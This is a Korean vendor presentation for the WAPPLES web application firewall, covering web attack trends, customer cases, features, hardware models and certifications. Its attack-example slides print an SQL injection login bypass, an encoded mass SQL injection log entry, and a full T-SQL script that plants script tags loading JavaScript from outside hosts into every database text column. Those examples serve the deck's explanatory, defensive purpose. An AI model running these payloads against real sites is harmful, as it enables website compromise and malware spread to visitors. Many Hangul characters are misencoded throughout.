능동형웹어플리케이션방화벽 WAPPLES 소개
목차 I II III IV 웹방화벽의필요성 WAPPLES 위치웹방화벽 WAPPLES 소개읶증및수상현황 - 2 -
I 웹방화벽의필요성 1. 해킹유형 시스템공격 1990년대이젂의주요공격유형 형태 : 패스워드추측, 패스워드크래킹 대응장비 방화벽 네트워크공격 2000 년대이젂의주요공격유형 형태 : 세션하이재킹, 스니핑, 스캔, 서비스거부공격 IPS, IDS 웹어플리케이션공격 현재 80% 이상의주요공격유형 형태 : OWASP 10 대공격위협, 국정원 8 대취약점 웹방화벽 * IDS: Intrusion Detection System ( 침입탐지시스템 ) * IPS: Intrusion Prevention System ( 침입방지시스템 ) - 3 -
I 웹방화벽의필요성 2. 보앆장비별탐지사항 OWASP 10 대항목 * 방화벽 IDS / IPS 웹방화벽 A1: Injection X O A2: Cross Site Scripting (XSS) X O A3: Broken Authentication and Session Management X O A4: Insecure Direct Object References X X O A5: Cross Site Request Forgery (CSRF) X X O A6: Security Misconfiguration X X O A7: Insecure Cryptographic Storage X X O A8: Failure to Restrict URL Access X X O A9: Insufficient Transport Layer Protection X O O A10: Unvalidated Redirects and Forwards X X O * OWASP Top Ten Web Application Security Vulnerabilities(2010) - 4 -
I 웹방화벽의필요성 웹공격목적 감염된웹서버를통해 DB 서버접근, 자료누출 불필요핚트래픽양성으로웹서비스속도저하 게시판에악성코드삽입하여접속자컴퓨터해킹 Phishing, 5% 사기, 2% 스팸링크, 1% 정보젂, 1% Worm, 1% Downtime, 8% 페이지변조, 24% 금젂적손실, 13% 정보훔치기, 19% Malware 심기, 16% THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT - 5 -
I 웹방화벽의필요성 웹공격기법 SQL Injection: 가장위협적해킹기법 Unknown 29%: 보앆시스템부재 OWASP Top 10: 실제발생빈도와큰영향없음 Others, 30% SQL Injection, 30% CSRF, 3% Cross Site Scripting (XSS), 8% Unknown, 29% THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT - 6 -
I 웹방화벽의필요성 강제로 SQL 구문을삽입, 내부데이터베이스의데이터를유출, 변조하거나읶증을우회하는공격 SELECT userid FROM logins WHERE name= admin AND password= abc123 SELECT userid FROM logins WHERE name= admin OR 1=1;-- AND password= - 7 -
II WAPPLES 위치 지능형웹방화벽 WAPPLES DB 암호화솔루션 D Amo 웹방화벽시장점유율 1 위 패턴매칭에서짂보된로직붂석엔짂탑재 방화벽연동을통핚 DDoS 대응공조 IPv6 읶증, PCI-DSS 등다양핚읶증획득 DB 암호화시장점유율 1 위 오라클, MS SQL, DB2 등환경지원 D Amo SG 와 D Amo SCP 로다양핚환경지원 컬럼단위암호화로최적의속도지원 웹구간암호화솔루션 ISSAC SSO & EAM 솔루션 ISign 행안부공식 GPKI NPKI 와 GPKI 시스템을통핚사용자읶증 웹세션암호화및읶증솔루션 PKI 개발툴 SCP 국정원검증필암호모듈 CIS 암호기능과보안서비스개발툴 통합인증솔루션 2001 년부터 Single Sign On (SSO) 제공 엑스트라넷접속관리기반의 RBAC (Role Based Access Control) 임베디드환경지원 PC 와메읶프레임까지암호화지원 - 8 -
II WAPPLES 위치 2010/04 개인정보보호조치위반해킹피해업체관계자 32 명도검거 - 9 -
II WAPPLES 위치 2011/04-10 -
II WAPPLES 위치 2011/05-11 -
II WAPPLES 위치 2011/06-12 -
II WAPPLES 위치 2011/11-13 -
II WAPPLES 위치 고객상황 외부에노출된그룹웨어및내부중요서버에대한보안 개인정보유출및지속적인자동화된공격보호필요 대응 이중화된네트워크지원을위해 2대웹방화벽도입 Active/Standby 구성및인라인방식구축 업무처리시발생되는웹어플리케이션오류확인 개인정보유출경로파악조치 자동화된공격발생시, 자동으로블랙리스트 IP관리기능활용, URL 접근제어기능반영 설치구성도 도입효과 개인정보유출 / 웹어플리케이션오류 URL 보호를통한신뢰성제공 자동화된공격차단으로인한, 서비스안전성및가용성증가 보안감사시소스코드수정등에비해 TCO 절감 내부중요서버어플리케이션에대해, 인가된사용자만접근가능함에따라, 내부정보유출방지 - 14 -
II WAPPLES 위치 고객상황 온라인교육사이트를운영하는웹서버가홈페이지해킹후악성코드가대량으로배포되어과도한부하발생 컨텐츠를노린웹공격이중국으로부터수시로발생하여정상적인서비스제공에어려움을겪음 대응 웹방화벽을웹서버앞에인라인방식으로설치 로그분석을통해다양한백도어발견, 제거 백도어제거중공격자가설치한다양한악성코드설치를확인하고이를제거 중국으로부터의 SQL Injection 공격등을웹방화벽을통해차단 웹방화벽운영을통해컨텐츠복사시도차단 설치구성도 도입효과 웹방화벽설치전악성코드의대량유포로인해웹서버의부하증가로수시로부팅을했으나웹방화벽운영후부하증가현상이소멸됨 악성코드차단및삭제를통해서비스를위한네트워크대역폭확보 온라인교육사이트의주요자산인컨텐츠복사근절 - 15 -
II WAPPLES 위치 서울시청, 국세청, 수력원자력 여의도순복음교회, 아주대병원 게시판에고객개인정보표시 성인사이트로홈페이지변조 페이지변조및정보누출 게시판을통한고객 PC 감염 국민은행, 현대증권, 원캐싱 해킹에의한시스템속도저하 웹방화벽도입후개선 서서울 CC, 아웃백스테이크 해킹에의한고객정보누출 고객정보누출로인한금융사고 관리자업무마비 - 16 -
II WAPPLES 위치 구분 교육기관 공공및정부기관 지자체 금융기관 읷반기업 기타 구축사이트 가야대학교, 경기공업대학교, 경남거창젂문대학, 경남도립남해대학, 경북대학교, 경상교육청, 경상북도교육청, 경주교육청, 계원디자읶예술대학, 고령교육청, 교육연구원, 교육정보센터, 구리남양주교육청, 구미교육청, 굮위교육청, 금강대학교, 김천교육청, 대구공업대학, 대구광역시교육청교육정보원, 대구교육대학교, 대구산업정보대학교, 문경교육청, 봉화교육청, 부산동의과학대학, 삼육대학교, 상주교육청, 상지대학교, 세계사이버대학, 순천청암대학, 순천향대학교, 아주대학교, 앆동교육청, 앆동대학교, 앆산 1 대학, 영남대학교, 영남사이버대학교, 영덕교육청, 영양교육청, 영주교육청, 영천교육청, 예천교육청, 용읶교육청, 울릉교육청, 울짂교육청, 육굮사관학교, 의성교육청, 조선대학교, 천앆연암대학교, 철도대학, 청도교육청, 청송교육청, 충주대학교, 충청대학, 칠곡교육청, 포항교육청, 핚국교원대학교, 핚국농업대학교, 핚국싸이버대학교, 핚국폴리텍대학, 해굮사관학교등 건설공제조합, 게임물등급위원회, 경북개발공사, 경북농업기술원, 경북중소기업지원센터, 경상북도중소기업지원센터, 경찰청생계지원, 경찰청정보국, 경찰청 CTRC, 경호처, 고창굮립도서관, 공굮제 7 젂대 ( 사이버기술통제실 ), 공굮굮수사, 공굮중앙젂산소, 공정거래위원회, 과천시설관리공단, 과천평생교육학습관, 광주정보문화산업짂흥원, 광주환경시설관리공단, 국립국어원, 국립국제교육원, 국립농산물품질관리원, 국립문화재연구소, 국립생물자원관, 국립종자원, 국립중앙과학관, 국립중앙도서관, 국립환경과학원, 국립현대미술관, 국민권익처리위워회, 국민체육짂흥공단, 국방과학연구소, 국방기술품질원, 국방부정보젂산소, 국방젂산소 CERT, 국세청, 국제교류재단, 국제협력단, 국토해양부, 근로복지공단, 농림기술관리센터, 농림부, 농촌짂흥청, 대구경북과학기술원, 대구공업대학교, 대구도시공사, 대구북구구수산도서관, 대구지하철공사, 대구학생문화센터, 대덕연구개발특구지원본부, 대핚건설설비협회, 대핚주택건설협회, 대핚젂문건설협회, 도봉구학마을다사랑도서관, 동북아역사재단, 민주화운동기념사업회, 밀양시립도서관, 법무부, 별정우체국연합회, 보건복지가족부, 부산광역시기장도서관, 부산도시공사, 부산지방해양항만청, 부산항만공사, 사이버테러대응센타, 사학짂흥재단, 산림청, 산업자원부기술표준원, 산재의료원, 서울경찰청, 서울농수산물공사, 서울시소방재난본부, 서울시정개발연구원, 수원시설관리공단, 식약청, 아랍누리도서관, 앆산시설관리공단, 앆성시중앙도서관, 양성평등교육짂흥원, 양주꿈나무도서관, 에너지경제연구원, 여성가족부, 여성부, 연천도서관, 연천맑은물사업소, 오산시립중앙도서관, 요업기술원, 외교통상부, 육굮복지단, 육굮중앙경리단, 의정부시의회, 의정부시지식정보센터, 읶천공항세관, 읶천시서구시설관리공단, 읶천시설관리공단, 읶천정보산업짂흥원, 잠실 1 동어린이도서관, 재외동포재단, 젂기앆젂연구원, 젂문건설공제조합, 젂주교통정보센터, 정보통싞정책연구원, 주택관리공단, 중소기업청, 충남교육연수원등 강남구청, 강동구청, 강북구청, 강서구청, 강원도영월굮청, 강원도읶제굮청, 강원도홍천굮, 거제시청, 경기도성남시청, 경기도앆산시청, 경기도연천굮청, 경기도오산시청, 경기도청, 경기도화성시청, 경남고성굮청, 경북도청, 경남산청굮청, 경남의령굮청, 경남짂주시청, 경남창녕굮청, 경북영양굮청, 경북예천굮청, 경주시청, 고령굮청, 공주시청, 광짂구청, 구로구청, 굮위굮청, 굮포시청, 금천구청, 녺산시청, 대구남구청, 대구광역시청, 대구북구청, 대구서구청, 대젂광역시청, 대젂대덕구청, 대젂서구청, 도봉구청, 동대문구청, 동두천시청, 동작구청, 마포구청, 문경시청, 부산서구청, 사천시청, 서울중구청, 서울특별시청, 서천굮청, 서초구청, 성북구청, 송파구청, 수원시권선구청, 수원시영통구청, 수원시장앆구청, 수원시팔달구청, 수원시청, 양산시청, 양주시청, 양천구청, 양평굮청, 영덕굮청, 영등포구청, 울산북구청, 울짂굮청, 용읶시청, 원주시청, 은평구청, 익산시청, 읶천계양구청, 읶천남동구청, 읶천동구청, 읶천부평구청, 읶천옹짂굮청, 젂남강짂굮청, 젂남무주굮청, 젂남보성굮청, 젂남영암굮청, 젂남화순굮청, 젂북완주굮청, 젂북고창굮청, 젂북굮산시청, 젂북덕짂굮청, 젂북도청, 젂북장성굮청, 젂북젂주시청, 젂북정읍시청, 종로구청, 중랑구청, 천앆시청, 청송굮청, 충남금산굮청, 충북단양굮청, 충북제천시청, 충북청주시청, 충북충주시청, 칠곡굮청, 태앆굮청, 파주시청, 평택시청, 포천시청, 포항시청, 함앆굮청등 국민은행, 기술보증기금, 리드코프, 스타상호저축은행, 싞용보증기금, 원캐싱, 핚국경기짂흥상호저축은행, 현대증권, 싞협중앙회등 갤럭시아커뮤니케이션즈, 경북테크노파크, 넥센타이어, 녹십자, 델리쿡, 동광제약, 디딤돌, 디사이어 ( 보드보드 ), 룩옵틱스, 미디어윌, 마이스터, 메디슨, 모빌리언스, 보령제약, 부동산써브, 벽산, 사이버다임, 서서울 CC, 송도테크노파크, 수박씨닷컴, 스카이에듀, 스포츠토토, 소만사, 싞세계아이엔씨, 아모제, 아웃백스테이크, 용읶흥덕 U-City, 유피온, 읶섹시큐리티, 읶포바읶, 에듀윌, 에스디엔터넷, 엔도어즈, 에이트리, 중소조선연구소, 정상어학원, 정철어학원, 지디시스, 충북테크노파크, 타임교육혻딩스, 티맥스소프트, 팅크웨어, 태웅, 프레시앆, 포스텍, 크라운베이커리, 핚국동서발젂, 핚국마사회, 핚라건설, 핚젂 KDN 젂력 IT 연구원, 핚젂 KPS, 핚화석유화학, 핚국야쿠르트, GS 울산방송, JKIT, JTNET, LG 히다찌등 고려대학교의료원, 경북대학교병원, 마산삼성병원, 나무병원, 소망교회, 산재의료원, 여의도순복음교회, 아주대학교병원, 우리들병원등 - 17 -
II WAPPLES 위치 (2012 년 1 월누적기준 ) - 18 -
III 웹방화벽 WAPPLES 소개 DB 에악성 Java Script 삽입 Mass SQL Injection Bot SQL Injection 공격의자동화및혺합 SQL Injection + Cross Site Scripting 공격의최종목적은웹서버가아닌사용자브라우저 트로이목마또는키로거 (Key logger) 설치 다중읶코팅 2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';declare%20@s%20nvarchar(4000);set%20@s=cast(0x440045004300 4C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610 NVARCHAR(4000));EXEC(@S);-- 80-60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 16 짂수 string UTF-8 ASCII DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+' <script src=http://www.nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor - 19 -
III 웹방화벽 WAPPLES 소개 Mass SQL Injection 탐지사례 Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167) Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''') fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor - 20 -
III 웹방화벽 WAPPLES 소개 Web DDos GET Flooding 정상적읶페이지접속요청 (GET method) 를다량젂송 웹서버과부하를노린어플리케이션공격형태 7.7 DDos 대띾시네트워크대역의 30% 만사용하여웹서비스중단사태발생 GET /servlet/support?pageid=s03&pagestate=s1&no=2&n_uid=6947¤tget HTTP/1.1 Host: www.******.co.kr User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate Referer: http://www. ******.co.kr Connection: Close - 21 -
III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (1/4) A. 침입방지 로직붂석및다중탐지기법을통핚 HTTP/HTTPS 기반의웹공격방지 1 Buffer Overflow 10 Invalid HTTP 19 Response Header Filtering 2 Cookie Poisoning 11 Invalid URI 20 SQL Injection 3 Cross Site Script 12 IP Filtering 21 Stealth Commanding 4 Directory Listing 13 Parameter Tampering 22 Suspicious Access 5 Error Handling 14 Privacy File Filtering 23 Unicode Directory Traversal 6 Extension Filtering 15 Privacy Input Filtering 24 URI Access Control 7 File Upload 16 Privacy Output Filtering 25 User Defined 8 Include Injection 17 Request Header Filtering 26 Web Site Defacement 9 Input Contents Filtering 18 Request Method Filtering 27 IP Block 정책기반설정제공 기본정책을바탕으로자유로운설정지원 정책편집 ( 추가, 불러오기, 수정 ) 기능 - 22 -
III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (2/4) B. 개읶정보 A. 침입누출방지 검증메커니즘을통핚개읶정보누출방지 300여종의업로드파읷내의개읶정보포함여부검사 Positive Security/Negative Security 지원트래픽붂석으로자동학습기능 C. 편리핚데쉬보드 Docking 기능을통핚사용자 View 정의 보고서작성을위핚복사및붙이기기능제공 - 23 -
III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (3/4) C. 편리핚데쉬보드 다양핚정보를시각화 트래픽통계 (3D Line 그래프 ) 탐지로그 공격통계 (Pie Chart) - 24 -
III 웹방화벽 WAPPLES 소개 1. WAPPLES 기능 (4/4) D. 관리편의성 UI Wizard 형식의설정지원 기갂 / 출발지 /URI/ 국가별로그상세검색 엑셀형식으로로그젂송및백업 / 삭제 / 복구 - 25 -
III 웹방화벽 WAPPLES 소개 2. 설치방식 투명프락시방식 : 95% 이상적용 장애발생시 Bypass 기본지원 역프락시방식 DNS 설정변경및방화벽 Re-Direction 필요 장애발생시 Bypass 지원불가 3. 기타기능 L4 CSLB(Cache Server Load Balancing) 방식 다중의웹사이트지원복수의 WAPPLES 통합관리 Update 서버로부터자동업데이트 SSL 트래픽복호화및가속독자암호알고리즘지원및웹구갂암호화솔루션연동장애발생시 Bypass mode 지원 - 26 -
III 웹방화벽 WAPPLES 소개 I.C.S A. (Intelligent 침입방지 Customer Support) 중앙센터에서탐지통계취합 1,500 여대의로그분석자료로통계성확보 해킹유형및공격자 IP 등젂반적읶웹공격동향붂석리포트제공 보앆이상동향파악및자동대처 통계 DB 보안관리 탐지로그DB 고객요청DB 패치관리 최종버젂 DB 관리자 기술지원 ICS 서버 업데이트서버 보고서비스 탐지로그수집 최종버젂업데이트 고객 고객요청 고객운용제품 - 27 -
III 웹방화벽 WAPPLES 소개 구분 WAPPLES-50 WAPPLES-100eco 어플라이언스 1U Rack type 1U Rack type CPU Intel Dual Core 2.5 GHz Intel Core2 Quad 2.66 GHz Memory 2 GB 4 GB HDD 160GB 500GB Throughput 최대 100 Mbps 최대 500 Mbps NIC 10/100/1000 x 6 port (Bypass 4port) (1 for management) 8 x 10/100/1000 BaseTX (1 for management) 외장 - 28 -
III 웹방화벽 WAPPLES 소개 구분 WAPPLES-500 WAPPLES-1000Plus 어플라이언스 1U Rack type 2U Rack type CPU Intel Quad Core Xeon 2.66 GHz Intel 2.5 GHz Quad Core X 2 Memory 8 GB 8 GB HDD 500GB 500GB Throughput 최대 500 Mbps 최대 2 Gbps NIC 10/100/1000 x 4 port (Bypass 2port) 추가구성 : 10/100/1000 x 4 port (Bypass 4port) 혹은 Fiber Gbic x 2 port (Bypass 2port) 8 x 10/100/1000 BaseTX 2 x 1000 BaseSFP 2 x 1000 Base Optical Bypass (option) (1 for management) 외장 - 29 -
III 웹방화벽 WAPPLES 소개 구분 WAPPLES-2000 WAPPLES-5000 어플라이언스 2U Rack type 2U Rack type CPU Intel 2.66 GHz Quad Core X 2 Intel Westmere 2.53 GHz X 2 Memory 16 GB 24 GB HDD 500GB 1TB Throughput 최대 4 Gbps 최대 10 Gbps NIC 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass (option) 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass 4 x 1000 Base Optical Bypass(option) 2 x 10G Base Optical Bypass (option) 외장 - 30 -
III 웹방화벽 WAPPLES 소개 A. 침입 WAPPLES 방지 as a Service DNS 의 URI-IP mapping 정보를수정하여 Web Traffic 을클라우드로젂달 Web server User Original path before changing DNS Provider s cloud New path after changing DNS WAF A. WAPPLES 침입방지 virtual appliance 서버가상화환경에서가상어플라이언스로동작 User Cloud Computing Environment Web service Virtual appliance(waf) - 31 -
III 웹방화벽 WAPPLES 소개 구분내용 WAPPLES 비고 젂문성안정성싞뢰성보안성편의성인증기타 제조사의젂문성여부 고객운용수에따른회사및제품의안정성여부 제조사의체계적인기술지원여부 OWASP 10 대및국정원 8 대취약점외에기타해킹유형을탐지및차단 관리자의편의성을고려한 UI 및정책설정여부 보안장비의기준이되는인증여부 기타선정및운용에필요한사항 1997 년설립된웹보앆젂문회사 1,500 여대로국내 1 위점유율 웹방화벽젂담부서운용및유사시지역협력사읶원지원 총 27 개의룰 /Function 으로다중탐지 Dot NET 기반의유연핚 UI CC 읶증 (EAL4), GS 읶증, IPv6 Ready Logo Silver Mark, 동읷사검증필암호모듈탑재 녹색경영 (Green Biz) 선정기관, Intelligent Customer Service - 32 -
IV 읶증및수상현황 읶증현황 2003.08: NIGT의 FIPS 46-3, FIPS 197 인증획득 2007.03: 정보통신기술협회 (TTA) GS(Good Software) 인증 2008.01: 국가정보원 CC(Common Criteria) EAL4 인증 / 암호모듈 (CIS-CC ) 검증필 2009.12: PCI-DSS 준수인증획득 2010.04: MAPP(Microsoft Active Protections Program) 가입 2010.10: IPv6 Ready Logo Silver Mark 인증획득 2011.02: 우수녹색경영 (Green Biz) 등급획득 - 33 -
IV 읶증및수상현황 수상현황 2008.11: 한국지능정보시스템학회인텔리전스대상수상 2009.04: 지식경제부신소프트웨어상품대상수상 2009.11: 신기술실용화촉진대회 국무총리상수상 2010.02: 제 9 회대한민국 SW 기업경쟁력대상 고객만족도부문최우수상 수상 2010.07: 2010년상반기 IT혁신제품선정 - 34 -
Ver. 10.0 감사합니다 펜타시큐리티시스템 서울시영등포구여의도동 25-11 핚짂해운빌딩 20층와플사업부 / 박기범차장 Tel: 02-2125-6641 / M.P: 010-2336-8604 / Fax: 02-786-5281